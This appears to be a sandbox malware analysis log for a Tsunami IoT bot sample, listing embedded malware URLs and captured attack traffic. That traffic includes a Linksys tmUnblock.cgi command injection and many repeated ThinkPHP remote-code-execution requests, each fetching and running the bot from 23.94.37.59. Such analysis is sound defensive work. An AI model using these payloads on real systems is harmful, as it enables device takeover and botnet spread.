    Source: Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmpString found in binary or memory: http://23.94.37.59/bins/Tsunami.mips;
    Source: Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmpString found in binary or memory: http://23.94.37.59/bins/Tsunami.x86
    Source: Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmpString found in binary or memory: http://23.94.37.59/zyxel.sh;
    Source: Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding//%22%3E
    Source: Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
    Source: Tsunami.x86String found in binary or memory: http://upx.sf.net
    Source: Xorg.0.log.103.dr, Xorg.0.log.59.dr, Xorg.0.log.152.drString found in binary or memory: http://wiki.x.org
    Source: Xorg.0.log.103.dr, Xorg.0.log.59.dr, Xorg.0.log.152.drString found in binary or memory: http://www.ubuntu.com/support)
    Source: unknownHTTP traffic detected: POST /tmUnblock.cgi HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: python-requests/2.20.0Content-Length: 227Content-Type: application/x-www-form-urlencodedData Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 54 73 75 6e 61 6d 69 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 32 33 2e 39 34 2e 33 37 2e 35 39 25 32 46 62 69 6e 73 25 32 46 54 73 75 6e 61 6d 69 2e 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 54 73 75 6e 61 6d 69 2e 6d 70 73 6c 25 33 42 2b 2e 25 32 46 54 73 75 6e 61 6d 69 2e 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31 Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Tsunami.mpsl%3B+wget+http%3A%2F%2F23.94.37.59%2Fbins%2FTsunami.mpsl%3B+chmod+777+Tsunami.mpsl%3B+.%2FTsunami.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
